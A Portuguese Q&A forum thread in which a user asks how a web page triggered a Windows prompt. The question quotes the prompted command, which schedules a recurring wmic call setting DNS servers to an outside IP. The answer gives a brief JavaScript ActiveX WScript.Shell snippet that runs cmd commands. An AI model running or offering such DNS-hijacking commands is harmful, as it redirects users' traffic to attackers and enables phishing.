Como um navegador consegue executar um comando no cmd?

Navegue suas respostas
3

Algum tempo atrás, enquanto visitava algum site no Opera 12.12 após o prompt do UAC do Windows 7 apareceu na tela: 

C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")

Obviamente, eu recusei.

O método pelo qual os phishers tentaram obter meus dados é bastante claro, mas como eles conseguiram executar o comando do navegador?

    
por Paul 20.09.2014 / 09:09

1 resposta

2

Os phishers podem usar JavaScript assim: 

var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);

Funciona apenas se você desativar os recursos de segurança em seu navegador, que precisarão usar o ActiveX.

    
por 20.09.2014 / 12:19

Tags

Massively (bulk) reassociando arquivos torrent com seus dados? como impedir que jenkins limpem a área de trabalho quando iniciaram uma nova compilação?